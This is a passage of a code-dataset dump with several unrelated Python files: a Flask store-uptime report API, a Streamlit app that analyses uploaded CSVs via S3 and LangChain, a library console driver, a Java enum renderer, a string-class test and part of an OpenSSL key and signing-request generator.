csv.reader(file)\n next(reader)\n for row in reader:\n store_id, timezone_str = row\n store = storetimezone(store_id=store_id, timezone_str=timezone_str)\n db.session.add(store)\n\n # Load business hours data from business_hours.csv\n with open('store_business_hours.csv', 'r') as file:\n reader = csv.reader(file)\n next(reader)\n for row in reader:\n store_id, day, start_time_local, end_time_local = row\n business_hours = businesshours(store_id=store_id, day_of_week=day,\n start_time_local=start_time_local, end_time_local=end_time_local)\n db.session.add(business_hours)\n\n with open('store_poll.csv', 'r') as file:\n csv_data = csv.DictReader(file)\n for row in csv_data:\n store_id = row['store_id']\n timestamp_utc = row['timestamp_utc']\n status = row['status']\n\n # Insert the record into the database\n new_polling_data = pollingdata(store_id=store_id, timestamp_utc=timestamp_utc, status=status)\n db.session.add(new_polling_data)\n\n db.session.commit()\n\n# Function to generate a unique report ID\ndef generate_report_id():\n return str(uuid.uuid4())\n\n# API endpoint to trigger report generation\n@app.route('/trigger_report', methods=['POST'])\ndef trigger_report():\n # Logic to generate the report\n current_timestamp = datetime.now()\n 
report_id = generate_report_id() # Implement a function to generate a unique report ID\n\n # Get the max timestamp among all observations\n max_timestamp = pollingdata.query.with_entities(pollingdata.timestamp_utc).order_by(pollingdata.timestamp_utc.desc()).first()[0]\n\n # Perform the report generation logic\n business_hours = businesshours.query.all()\n\n # Define report headers\n headers = ['store_id', 'uptime_last_hour(in minutes)', 'uptime_last_day(in hours)',\n 'update_last_week(in hours)', 'downtime_last_hour(in minutes)',\n 'downtime_last_day(in hours)', 'downtime_last_week(in hours)']\n \n report_data = [headers]\n\n # Iterate over each store\n stores = storetimezone.query.all()\n for store in stores:\n store_id = store.store_id\n timezone_str = store.timezone_str\n\n # Convert max timestamp to the store's timezone\n max_timestamp_store_tz = convert_utc_to_timezone(max_timestamp, timezone_str)\n\n # Calculate the time intervals for the report\n interval_last_hour_start = max_timestamp_store_tz - timedelta(hours=1)\n interval_last_day_start = max_timestamp_store_tz - timedelta(days=1)\n interval_last_week_start = max_timestamp_store_tz - timedelta(weeks=1)\n\n # Retrieve polling data within each time interval\n polling_data_last_hour = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_hour_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n polling_data_last_day = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_day_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n polling_data_last_week = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_week_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n # Interpolate uptime and downtime based on the available polling data and business hours\n uptime_last_hour = interpolate_uptime(polling_data_last_hour, business_hours)\n uptime_last_day = interpolate_uptime(polling_data_last_day, business_hours)\n uptime_last_week = interpolate_uptime(polling_data_last_week, business_hours)\n\n downtime_last_hour = interpolate_downtime(polling_data_last_hour, business_hours)\n downtime_last_day = interpolate_downtime(polling_data_last_day, business_hours)\n downtime_last_week = interpolate_downtime(polling_data_last_week, business_hours)\n\n # Create a row for the store in the report data\n row = [store_id, uptime_last_hour, uptime_last_day, uptime_last_week,\n downtime_last_hour, downtime_last_day, downtime_last_week]\n report_data.append(row)\n\n # Save the report data to a CSV file\n file_path = f'D:/{report_id}.csv'\n with open(file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(report_data)\n\n # Update the report status and file path\n new_report = report(report_id=report_id, status='Complete', file_path=file_path)\n db.session.add(new_report)\n db.session.commit()\n\n return jsonify({'report_id': report_id})\n\n# API endpoint to retrieve the report status or the CSV file\n@app.route('/get_report', methods=['GET'])\ndef get_report():\n # Get the report ID from the request\n report_id = request.args.get('report_id')\n\n # Check if the report ID exists in the database\n report_item = report.query.get(report_id)\n if not report_item:\n return jsonify({'status': 'Report not found'})\n\n # Check the status of the report\n if report_item.status == 'Running':\n return jsonify({'status': 'Running'})\n elif report_item.status == 
'Complete':\n # Return the CSV file with the schema described\n file_path = report_item.file_path\n with open(file_path, 'r') as file:\n csv_data = file.read()\n\n # Return the CSV file and status\n return jsonify({'status': 'Complete', 'report_csv': csv_data})\n\n return jsonify({'status': 'Unknown error'})\n\ndef convert_utc_to_timezone(utc_timestamp, timezone_str):\n utc = pytz.timezone('UTC')\n target_timezone = pytz.timezone(timezone_str)\n utc_time = utc.localize(utc_timestamp)\n target_time = utc_time.astimezone(target_timezone)\n return target_time\n\n# Utility function to interpolate uptime based on polling data and business hours\ndef interpolate_uptime(polling_data, business_hours):\n total_uptime = 0\n for data in polling_data:\n timestamp = datetime.strptime(data.timestamp_utc, '%Y-%m-%d %H:%M:%S')\n day_of_week = timestamp.weekday()\n\n # Find the corresponding business hours for the day of the week\n hours = next((hours for hours in business_hours if hours.store_id == data.store_id and hours.day_of_week == day_of_week), None)\n\n if hours:\n start_time = datetime.strptime(hours.start_time_local, '%H:%M:%S').time()\n end_time = datetime.strptime(hours.end_time_local, '%H:%M:%S').time()\n\n # Calculate the uptime based on the polling status and business hours\n if start_time <= timestamp.time() <= end_time and data.status == 'open':\n total_uptime += 1\n\n return total_uptime\n# Utility function to interpolate downtime based on polling data and business hours\ndef interpolate_downtime(polling_data, business_hours):\n total_downtime = 0\n for data in polling_data:\n timestamp = datetime.strptime(data.timestamp_utc, '%Y-%m-%d %H:%M:%S')\n day_of_week = timestamp.weekday()\n\n # Find the corresponding business hours for the day of the week\n hours = next((hours for hours in business_hours if hours.store_id == data.store_id and hours.day_of_week == day_of_week), None)\n\n if hours:\n start_time = datetime.strptime(hours.start_time_local, '%H:%M:%S').time()\n end_time = datetime.strptime(hours.end_time_local, '%H:%M:%S').time()\n\n # Calculate the downtime based on the polling status and business hours\n if start_time <= timestamp.time() <= end_time and data.status == 'closed':\n total_downtime += 1\n\n return total_downtime\n\n\nif __name__ == '__main__':\n load_data_from_csv()\n app.run(debug=True)\n","repo_name":"Roshan23R/Restaurant_Monitor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39866186648","text":"import streamlit as st\nimport pandas as pd\nfrom langchain.agents import create_csv_agent\nfrom langchain.llms import OpenAI\nimport boto3\nimport uuid\nfrom io import StringIO\nfrom tabulate import tabulate\n\n\ndef main():\n st.title(\"CSV-GPT\")\n st.write(\"Analyze your CSV file instantly\")\n\n if 'uploaded' not in st.session_state:\n st.session_state.uploaded = False\n st.session_state.s3_file_path = None\n\n uploaded_file = st.file_uploader(\"Upload a CSV file\", type=['csv'])\n\n bucket_name = 'csv-gpt-uploads'\n\n s3 = boto3.client(\n 's3',\n aws_access_key_id=st.secrets.aws_access_key_id,\n aws_secret_access_key=st.secrets.aws_secret_access_key\n )\n\n if uploaded_file is not None and not st.session_state.uploaded:\n df = pd.read_csv(uploaded_file)\n\n file_name = f\"{uuid.uuid4().hex}.csv\"\n\n csv_buffer = StringIO()\n df.to_csv(csv_buffer)\n\n s3.put_object(Body=csv_buffer.getvalue(), Bucket=bucket_name, 
Key=file_name)\n\n st.session_state.uploaded = True\n st.session_state.s3_file_path = f\"https://{bucket_name}.s3.amazonaws.com/{file_name}\"\n\n st.success('File Uploaded Successfully! Now Start Analyzing.')\n\n analysis_query = st.text_input(\"Enter the analysis query\")\n amended_query = \"\"\"\n Use the analysis query to analyse the uploaded CSV sheet {analysis_query}\n\n Always try to provide a quantitative output and present the results in a dataframe format\n \"\"\"\n\n if st.button(\"Analyze Now\"):\n if st.session_state.uploaded and st.session_state.s3_file_path is not None:\n agent = create_csv_agent(OpenAI(temperature=0, openai_api_key=st.secrets.openai_api_key),\n st.session_state.s3_file_path,\n Model='gpt-4'\n )\n result = agent.run(analysis_query)\n\n st.write(result)\n else:\n st.warning(\"Please upload a CSV file first.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sivasurend/goml-llm-usecase-leaderboard","sub_path":"CSV-GPT.py","file_name":"CSV-GPT.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14206354794","text":"import Book\nimport Library\nimport PriorityQueue\n\ndef add_to_library():\n\n title = input(\"What is the title of book?\")\n author = input(\"Who is the author of the book?\")\n year = input(\"What year was the book published?\")\n\n while not year.isdigit():\n year = input(\"Re-enter the year as a number,\\n'year' must be class int.\")\n\n genre = input(\"What genre is the book?\")\n\n book = Book.Book(str(title), str(author), int(year), str(genre))\n\n l.add_book(book)\n\n pq = input(\"Would you like to add this book to the Priority Queue? (yes/no)\")\n if pq == \"yes\":\n add_to_pq(book)\n \n\ndef remove_from_library():\n print(\"removes\")\n title = input(\"What is the title of the book you want to remove?\")\n author = input(\"Who is the author of the book you want to remove?\")\n\n l.remove_book(title, author)\n\n pq = input(\"Would you like to remove the highest priority book from the Priority Queue? (yes/no)\")\n \n if pq == \"yes\":\n rem_pq()\n\ndef view_library():\n sort_l = input(\"Would you like to view a sorted Library? (yes/no)\")\n if sort_l == \"yes\":\n l.sort()\n print(l)\n\n view_min = input(\"Would you like to view the highest priority book? (yes/no)\")\n\n if view_min == \"yes\":\n view_min_pq()\n\n view_pq = input(\"Would you like to view the Priority Queue? (yes/no)\")\n\n if view_pq == \"yes\":\n view_priorityq()\n\ndef add_to_pq(b):\n l.add_pq(b)\n\ndef rem_pq():\n l.remove_pq()\n\ndef view_min_pq():\n print(l.next_pq())\n\ndef view_priorityq():\n print(l.get_pq())\n\n\nadd = input(\"Would you like to create a new Library? 
(yes/no)\")\nif add == \"yes\":\n l = Library.Library()\n\nwhile add == \"yes\":\n next_step = input(\"Would you like to add a book (add), remove a book (remove),\\nview the library (view), or end the program (end)?\")\n if next_step == \"add\":\n add_to_library()\n add = \"yes\"\n elif next_step == \"remove\":\n remove_from_library()\n add = \"yes\"\n elif next_step == \"view\":\n view_library()\n add = \"yes\"\n else:\n #re do this print statement later\n print(\"You elected to end the program,\\nor entered unrecognizable input.\")\n add = \"no\"\n\n\n","repo_name":"meganEwillis/CS232_datastructures","sub_path":"book_driver.py","file_name":"book_driver.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30542028020","text":"from autocode import utils\nfrom autocode import settings\n\ndef render(enum, owner):\n enum.remove_all_props('param')\n constructor_params = enum.params\n if enum.value_type is None:\n raise Exception('Enums must have type')\n\n if enum.extends is not None:\n raise Exception('Enums cannot extend other classes')\n\n comments = enum.render_comment()\n if comments == utils.EMPTY_COMMENT and settings.get_redundant_doctag_setting() is False:\n result = []\n else:\n result = ['/**', comments, ' */']\n\n indent_result = []\n implements_string = ''\n if enum.implements is not None:\n implements_string += ' implements %s' % ', '.join(enum.implements)\n\n\n indent_result.append(\"%s enum %s%s {\" % (enum.visibility, enum.name, implements_string))\n i = 1\n for key, value in sorted(enum.values):\n if value is None:\n enum_str = key\n else:\n enum_str = \"%s(%s)\" % (key, value)\n\n if i < len(enum.values):\n indent_result.append(enum_str + ',')\n else:\n indent_result.append(enum_str + ';')\n i += 1\n\n # Fields\n if len(enum.fields) > 0:\n indent_result.append(\"\\n\")\n indent_result.extend(x.render(enum) for x in utils.sort_fields(enum.fields.values()))\n indent_result.append(\"\\n\")\n\n from autocode.primitives import Function\n if enum.constructor is not None and enum.constructor != '':\n constructor_func = Function(enum.name, params=constructor_params)\n constructor_func.visibility = enum.visibility\n constructor_func.body = enum.constructor\n constructor_func.compile(enum)\n indent_result.append(constructor_func.render(enum))\n indent_result.append('')\n\n\n\n if len(enum.methods) > 0:\n methods = []\n preferred_methods = set()\n for preferred_method in enum._method_order:\n methods.append(enum.methods[preferred_method])\n preferred_methods.add(preferred_method)\n methods.extend(v for v in utils.sort_methods(enum.methods.values()) if v.name not in preferred_methods)\n\n indent_result.append(\"\\n\\n\".join(x.render(enum) for x in methods))\n\n result.append(\"\\n\".join(indent_result).replace(\"\\n\", \"\\n \"))\n result.append('}')\n return \" \\n\".join(result)\n","repo_name":"theRobinator/autocode","sub_path":"renderers/java/enumrenderer.py","file_name":"enumrenderer.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17600720465","text":"from SBString import *\nimport random\n\nreplicates = 300\ndebug = 0\n\ndef dprint( txt):\n\tglobal debug\n\tif debug > 0:\n\t\tprint(txt)\n\treturn(0)\n\ndef testblock(q, action, start, txt='', del_count=-1):\n\tif action=='i':\n\t\tdprint('----------- inserting starting at ' + str(start) + ' txt=' + txt)\n\t\ts = txt\n\t\tl = 
[]\n\t\tl.extend(q.get_string())\n\t\tl.insert(start, txt)\n\t\tq.insert(start, txt)\n\t\tdprint(''.join(l))\n\t\tdprint(q.get_string())\n\t\tassert(''.join(l) == q.get_string())\n\tif action == 'd':\n\t\tdprint('----------- deleting starting at ' + str(start) + ' count:' + str(del_count))\n\t\ts = txt\n\t\tl = []\n\t\tl.extend(q.get_string())\n\t\t#l.delete(start, del_count)\n\t\tdel l[start: start + del_count]\n\t\tq.delete(start, del_count)\n\t\tdprint('l: ' + ''.join(l))\n\t\tdprint('q: ' + q.get_string())\n\t\tassert(''.join(l) == q.get_string())\n\treturn(0)\n\t#print('*state: ' + q.show_state())\n\t#print('\t\t\t012345678901234567890')\n\t#print('*str: ' + q.get_string())\n\t#print('- - - - - - - - - - ')\n######################################################################\n#\ndef random_string(len):\n\ts = ''\n\tfor k in range(len):\n\t\tspace_test = int(random.expovariate(.5)) + 1\n\t\tif space_test > 5:\n\t\t\ts += ' '\n\t\telse:\n\t\t\ts += chr(random.randint(ord('a'), ord('z')))\n\treturn(s)\n\n\n######################################################################\n\nprint('Running ' + str(replicates) + ' inserts and delete ')\nq = SBString('hello world')\n#q.insert(len(q.get_string()), 'z')\n\nfor r in range(replicates):\n\tt = random.randint(0, 1)\n\tif t > .5:\n\t\tcode = 'i'\n\telse:\n\t\tcode = 'd'\n\tif len(q) < 10:\n\t\tcode = 'i'\n\ttestblock(q, code, 3, txt=random_string(random.randint(1, 10)), del_count=random.randint(1, 4))\n\n","repo_name":"rehoot/SBList","sub_path":"SBStest01.py","file_name":"SBStest01.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37168396477","text":"#!/usr/bin/python3\n\"\"\"\ncertiPy.py: An OpenSSL Tool for generating private keys and signing requests from a JSON file.\n\nAuthor: [Author Name]\nCompany: [Company Name]\n\nUsage: certiPy.py [-h] -i [-ol] [-n] [-c] [-d] [-y] [-opk] [-ipk] [-t] [-b] [-osr] [-conf] [-dig]\n\n options:\n -h, --help show this help message and exit\n\n input:\n -i , --input input file [JSON]\n\n logging:\n -ol , --output-log output path logs [default=/logs]\n\n input filter:\n -n , --network network name to generate private key and signing request for\n -c , --cluster cluster name to generate private key and signing request for\n\n terminal output:\n -d, --debug set to get debug output [default=False]\n -y, --skip-checking set to skip SSL parameter checking [default=False]\n\n private key generation:\n -opk , --output-pk output path private keys [default=/keys]\n -ipk , --input-pk prepared private key [default=None]\n -t , --type file type [default=pem]\n -b , --bits key size in bits (2048/4096/8192) [default=4096]\n\n signing request generation:\n -osr , --output-sr output path signing requests [default=/reqs]\n -conf , --config prepared config file for generating signing request [default=None]\n -dig , --digest hash function for generating the signing request (sha256/sha384/sha512) [default=sha256]\n\n\nExample:\n certiPy.py -i data.json\n\nThe input file should be in JSON format and contain the following fields:\n [\n {\n \"Network\": \"\",\n \"Cluster\":\n [\n {\n \"dns_alias_tech_cluster\": \"\",\n \"ip\": \"\",\n \"dns_alias_human_cluster\": \"\",\n \"machines\":\n [\n {\n \"machine\": \"\",\n \"dns_alias_tech_machine\": \"\",\n \"ipv4_address\": \"\",\n \"dns_alias_human_machine\": \"\"\n },\n {\n \"machine\": \"\",\n \"dns_alias_tech_machine\": \"\",\n \"ipv4_address\": \"\",\n 
\"dns_alias_human_machine\": \"\"\n },\n ]\n },\n {\n .\n .\n .\n }\n ]\n },\n {\n .\n .\n .\n }\n ]\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport stat\nimport subprocess\nimport json\nimport datetime\nimport re\n\n\n# Main ------------------------------------------------------------------------------------------------------------------------------------------------- #\ndef main(args: argparse.Namespace):\n \"\"\"\n The main function of the SSL tool.\n\n This function takes as input the argparse.Namespace object containing the parsed arguments and performs the main operations of the tool.\n It creates the necessary directories, loads the JSON data, generates private keys and signing requests, and logs the results.\n\n Args:\n args (argparse.Namespace): The parsed arguments.\n\n Logs:\n logging.info: Information about the generated private keys and signing requests.\n \"\"\"\n\n handle_directories(args.output_pk, args.output_sr)\n source = load_json_data(args.input)\n\n count_pk = count_sr = 0\n\n for cluster in get_clusters(source, args.network, args.cluster):\n try:\n private_key, count_pk = generate_private_keys(cluster.get(\"cluster\"), args.type, args.output_pk, args.input_pk, args.bits, args.debug, count_pk)\n signing_request, count_sr = generate_signing_requests(cluster, private_key, args.output_sr, args.config, args.digest, args.skip_checking, args.debug, count_sr)\n except Exception as e:\n logging.exception(f\"Failed to process cluster {cluster}: {e}\")\n continue\n\n print(\"-\" * os.get_terminal_size().columns)\n\n logging.info(f\"{count_pk} private keys generated.\")\n logging.info(f\"{count_sr} signing requests generated.\")\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Argument Parser -------------------------------------------------------------------------------------------------------------------------------------- #\ndef parse_arguments() -> argparse.Namespace:\n \"\"\"\n Parse command line arguments using argparse module.\n\n Returns:\n args (argparse.Namespace): Namespace object returned by argparse.ArgumentParser.parse_args() method, containing the values of the parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A simple SSL tool to automatically generate private keys and signing request from a JSON file.\", prog=\"certiPy.py\")\n\n # input\n required_args = parser.add_argument_group(\"input\")\n required_args.add_argument(\"-i\", \"--input\", type=str, required=True, metavar=\"\", help=\"input file [JSON]\")\n\n # logging\n logging_group = parser.add_argument_group(\"logging\")\n logging_group.add_argument(\"-ol\", \"--output-log\", type=str, required=False, default=\"logs\", metavar=\"\", help=\"output path logs [default=/logs]\")\n\n # filter input\n input_filter_group = parser.add_argument_group(\"input filter\")\n input_filter_group.add_argument(\"-n\", \"--network\", type=str,required=False, default=None, metavar=\"\", help=\"network name to generate private key and signing request for\")\n input_filter_group.add_argument(\"-c\", \"--cluster\", type=str,required=False, default=None, metavar=\"\", help=\"cluster name to generate private key and signing request for\")\n\n # output config\n terminal_output_group = parser.add_argument_group(\"terminal output\")\n terminal_output_group.add_argument(\"-d\", \"--debug\", required=False, default=False, action=\"store_true\", dest=\"debug\", help=\"set to get debug output 
[default=False]\")\n terminal_output_group.add_argument(\"-y\", \"--skip-checking\", required=False, default=False, action=\"store_true\", dest=\"skip_checking\", help=\"set to skip SSL parameter checking [default=False]\")\n\n # private keys\n private_key_generation_group = parser.add_argument_group(\"private key generation\")\n private_key_generation_group.add_argument(\"-opk\", \"--output-pk\", type=str, required=False, default=\"keys\", metavar=\"\", help=\"output path private keys [default=/keys]\")\n private_key_generation_group.add_argument(\"-ipk\", \"--input-pk\", type=str, required=False, default=None, metavar=\"\", help=\"prepared private key [default=None]\")\n private_key_generation_group.add_argument(\"-t\", \"--type\", type=str, required=False, default=\"pem\", metavar=\"\", help=\"file type [default=pem]\")\n private_key_generation_group.add_argument(\"-b\", \"--bits\", type=int, required=False, default=4096, choices=[2048, 4096, 8192], metavar=\"\", help=\"key size in bits (2048/4096/8192) [default=4096]\")\n\n # signing requests\n signing_request_generation_group = parser.add_argument_group(\"signing request generation\")\n signing_request_generation_group.add_argument(\"-osr\", \"--output-sr\", type=str, required=False, default=\"reqs\", metavar=\"\", help=\"output path signing requests [default=/reqs]\")\n signing_request_generation_group.add_argument(\"-conf\", \"--config\", type=str, required=False, default=None, metavar=\"\", help=\"prepared config file for generating signing request [default=None]\")\n signing_request_generation_group.add_argument(\"-dig\", \"--digest\", type=str, required=False, default=\"sha256\", choices=[\"sha256\", \"sha384\", \"sha512\"], metavar=\"\", help=\"hash function for generating the signing request (sha256/sha384/sha512) [default=sha256]\")\n\n args = parser.parse_args()\n check_arguments(parser, args)\n\n return args\n\n\ndef check_arguments(parser: argparse.ArgumentParser, args: argparse.Namespace):\n \"\"\"\n Check the validity of the provided arguments.\n\n Arguments:\n parser (argparse.ArgumentParser): The ArgumentParser instance used to parse the command-line arguments.\n args (argparse.Namespace): The Namespace object containing the parsed command-line arguments.\n\n Raises:\n argparse.ArgumentTypeError: If the input file is not a .json file.\n argparse.ArgumentTypeError: If input files can not be found.\n argparse.ArgumentTypeError: If input files do not have reading permission.\n \"\"\"\n # check input file format\n _, file_extension = os.path.splitext(args.input)\n if file_extension != \".json\":\n parser.error(f\"Input file must be a .json file, got {file_extension}\")\n\n # make absolute paths\n cwd = os.getcwd()\n for attr in [\"input\", \"output_log\", \"output_pk\", \"output_sr\", \"input_pk\", \"config\"]:\n file = getattr(args, attr)\n if file and not os.path.isabs(file):\n setattr(args, attr, f\"{cwd}/{file}\")\n\n # check if input files exists\n for file in [args.input, args.input_pk, args.config]:\n if file and not os.path.isfile(file):\n parser.error(f\"File not found: {file}\")\n\n # check input files read permission\n for file in [args.input, args.input_pk, args.config]:\n if file and not os.access(file, os.R_OK):\n parser.error(f\"Missing permission to read file: {file}\")\n\n # remove leading dot from key file extension/type\n args.type = args.type.strip().lstrip(\".\")\n# 
------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Logging ---------------------------------------------------------------------------------------------------------------------------------------------- #\ndef setup_logging(log_dir: str):\n \"\"\"\n Setup logging configuration.\n\n Arguments:\n log_dir (str): The directory where the log files will be stored.\n\n Logs:\n Main log file will be saved at `log_dir/main.log` and it will include the timestamp, logging level, message, filename and line number.\n \"\"\"\n os.makedirs(log_dir, exist_ok=True)\n\n FORMAT = \"%(asctime)s [%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\"\n logging.basicConfig(level=logging.DEBUG, format=FORMAT, handlers=[logging.FileHandler(f\"{log_dir}/main.log\"), logging.StreamHandler()])\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# JSON Data Handling ----------------------------------------------------------------------------------------------------------------------------------- #\ndef load_json_data(source: str) -> list:\n \"\"\"\n Load data from a JSON file.\n\n Arguments:\n source (str): The path of the file from which the data is to be loaded.\n\n Returns:\n data (dict): The data loaded from the file.\n\n Raises:\n FileNotFoundError: If the file is not found.\n json.JSONDecodeError: If there was an error decoding the JSON data.\n\n Logs:\n logging.info: Information about the data that was loaded.\n logging.error: Information about any errors encountered while loading the data.\n \"\"\"\n try:\n with open(source, \"r\") as file:\n data = json.load(file)\n logging.info(f\"Data loaded from file: {source}\")\n data = validate_data(data)\n return data\n except FileNotFoundError:\n logging.error(f\"File not found: {source}\")\n exit(1)\n except json.JSONDecodeError as e:\n logging.error(f\"Error loading data from file {source}: {e}\")\n exit(1)\n\n\ndef validate_data(source: list) -> list:\n \"\"\"\n Validate source data.\n\n Arguments:\n source (list): List of JSON objects\n\n Returns:\n data (list): List with all JSON objects which have network names.\n\n Logs:\n logging.warning: Number of JSON objects that have no network or cluster name and therefore are not included.\n \"\"\"\n data = []\n network_skipped = cluster_skipped = 0\n\n for item in source:\n if item.get(\"network\"):\n for cluster in item.get(\"cluster\"):\n if cluster.get(\"dns_alias_human_cluster\") or cluster.get(\"dns_alias_tech_cluster\"):\n data.append(item)\n else:\n cluster_skipped += 1\n else:\n network_skipped += 1\n\n if network_skipped > 0:\n logging.warning(f\"{network_skipped} network item(s) ingored due to missing network name!\")\n if cluster_skipped > 0:\n logging.warning(f\"{cluster_skipped} cluster item(s) ignored due to missing cluster name!\")\n\n return data\n\n\ndef get_clusters(source: dict, network: str, cluster: str) -> list:\n \"\"\"\n Get Cluster Infos based on network and cluster name.\n\n Arguments:\n source (dict): Dictionary containing the network and cluster information.\n network (str): Network name to filter for.\n cluster (str): Cluster name to filter for.\n\n Returns:\n clusters (list): List of dictionaries containing the network and cluster information.\n \"\"\"\n network_matches = [network_item for network_item in source if network_item.get(\"network\") == network or network is None]\n 
clusters = [{\"network\": network_item.get(\"network\"), \"cluster\": cluster_item}\n for network_item in network_matches\n\t\t\t\tif network_item.get(\"cluster\")\n for cluster_item in network_item.get(\"cluster\")\n if cluster_item.get(\"dns_alias_human_cluster\") == cluster or cluster_item.get(\"dns_alias_tech_cluster\") == cluster or cluster is None]\n return clusters\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Private Key Generation ------------------------------------------------------------------------------------------------------------------------------- #\ndef generate_private_keys(cluster: dict, type: str, output_pk: str, input_pk: str, bits: str, debug: bool, count: int):\n \"\"\"\n Generate private RSA keys for a given cluster.\n\n Arguments:\n cluster (dict): A dictionary containing information about a cluster.\n type (str): The type of RSA key file to be generated.\n output_pk (str): The output directory path where the RSA key file will be generated.\n input_pk (str): Path of an already generated private key. If provided the steps of the generation are skipped.\n bits (str): The number of bits to use when generating the key.\n debug (bool): A flag indicating whether to display the debug output of the RSA key information.\n count (int): Running count of generated private keys.\n\n Returns:\n file_path (str): The full path of the generated RSA key file.\n count (int): Running count of generated private keys\n \"\"\"\n cluster_name = cluster.get(\"dns_alias_human_cluster\") if cluster.get(\"dns_alias_human_cluster\") else cluster.get(\"dns_alias_tech_cluster\")\n cluster_name = re.sub(\"\\s+\", \"_\", cluster_name.strip())\n\n filename = f\"id_key_{cluster_name}_ssl.{type}\"\n file_path = os.path.join(output_pk, filename)\n\n if input_pk:\n logging.info(f\"Using provided private key: {input_pk}\")\n return input_pk, count\n if os.path.isfile(file_path):\n logging.info(f\"Using exisitng private key: {filename}\")\n return file_path, count\n else:\n create_rsa_key(filename, file_path, str(bits), debug)\n change_permission_to_read_only(file_path)\n count += 1\n return file_path, count\n\n\ndef create_rsa_key(filename: str, file_path: str, bits: str, debug: bool):\n \"\"\"\n Create an RSA private key using OpenSSL.\n\n Arguments:\n filename (str): The name of the RSA key file to be generated.\n file_path (str): The full path of the RSA key file to be generated.\n bits (str): The number of bits to use when generating the key.\n debug (bool): A flag indicating whether to display the debug output of the RSA key information.\n\n Raises:\n subprocess.CalledProcessError: If there is an error generating the RSA key using OpenSSL.\n\n Logs:\n logging.info: Information about the generated private key.\n logging.error: Information about any errors encountered while generating the RSA key using OpenSSL.\n \"\"\"\n try:\n subprocess.run([\"openssl\", \"genrsa\", \"-out\", file_path, bits], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT, check=True)\n if debug: subprocess.run([\"openssl\", \"rsa\", \"-text\", \"-noout\", \"-in\", file_path], stdout=subprocess.DEVNULL, check=True)\n logging.info(f\"Private key generated: {filename}\")\n except subprocess.CalledProcessError as e:\n logging.error(f\"Error generating RSA key: {e}\")\n exit(1)\n# 
------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Signing Request Generation --------------------------------------------------------------------------------------------------------------------------- #\ndef generate_signing_requests(cluster: dict, private_key: str, output_sr: str, config: str, digest: str, skip_checking: bool, debug: bool, count: int):\n \"\"\"\n Generate signing requests for the cluster.\n\n Arguments:\n cluster (dict): The cluster information.\n private_key (str): The path to the private key file.\n output_sr (str): The output directory for the signing requests.\n config (str): Path of an already generated config file.\n digest (str): The message digest algorithm to use when generating the signing request.\n skip_checking (bool): A flag indicating whether the SSL parameters have to be manually validated or not.\n debug (bool): A flag indicating whether to display the debug output of the signing request information.\n count (int): Running count of generated Signing Requests.\n\n Returns:\n file_path_sr (str): The path to the generated signing request.\n count (int): Running count of generated Signing Requests.\n\n Logs:\n logging.error: If the SSL parameters where NOT validated.\n logging.info: If the SSL parameters where validated.\n \"\"\"\n cluster_name = cluster.get(\"cluster\").get(\"dns_alias_human_cluster\") if cluster.get(\"cluster\").get(\"dns_alias_human_cluster\") else cluster.get(\"cluster\").get(\"dns_alias_tech_cluster\")\n cluster_name = re.sub(\"\\s+\", \"_\", cluster_name.strip())\n\n date = re.sub(\"\\.\\d+\", \"\", str(datetime.datetime.now())).replace(\"-\", \"\").replace(\" \", \"_\").replace(\":\", \"\")\n\n filename_sr = f\"{date}_id_req_{cluster_name}_ssl.csr\"\n file_path_sr = os.path.join(output_sr, filename_sr)\n\n filename_config = f\"{date}_csr_config_{cluster_name}.conf\"\n file_path_config = os.path.join(output_sr, \"config\", filename_config)\n\n csr_info = get_csr_info(cluster.get(\"network\"), cluster.get(\"cluster\"))\n\n # generate or update config file\n if not config:\n generate_config_file(csr_info, file_path_config)\n else:\n update_config_file(csr_info, config, file_path_config)\n\n if debug or not skip_checking:\n show_signing_request_infos(cluster.get(\"network\"), cluster.get(\"cluster\"), private_key, file_path_sr, file_path_config)\n\n if not skip_checking and input(\"Validate SSL Parameters (Y/N) > \").lower() != \"y\":\n logging.warning(\"SSL Parameters NOT validated!\")\n return None, count\n\n logging.info(\"SSL Parameters validated!\")\n\n create_signing_request(filename_sr, private_key, file_path_sr, file_path_config, digest, debug)\n change_permission_to_read_only(file_path_sr)\n change_permission_to_read_only(file_path_config)\n\n count += 1\n return file_path_sr, count\n\n\ndef generate_config_file(csr_info: dict, config_file_path: str):\n \"\"\"\n Generate a config file template. 
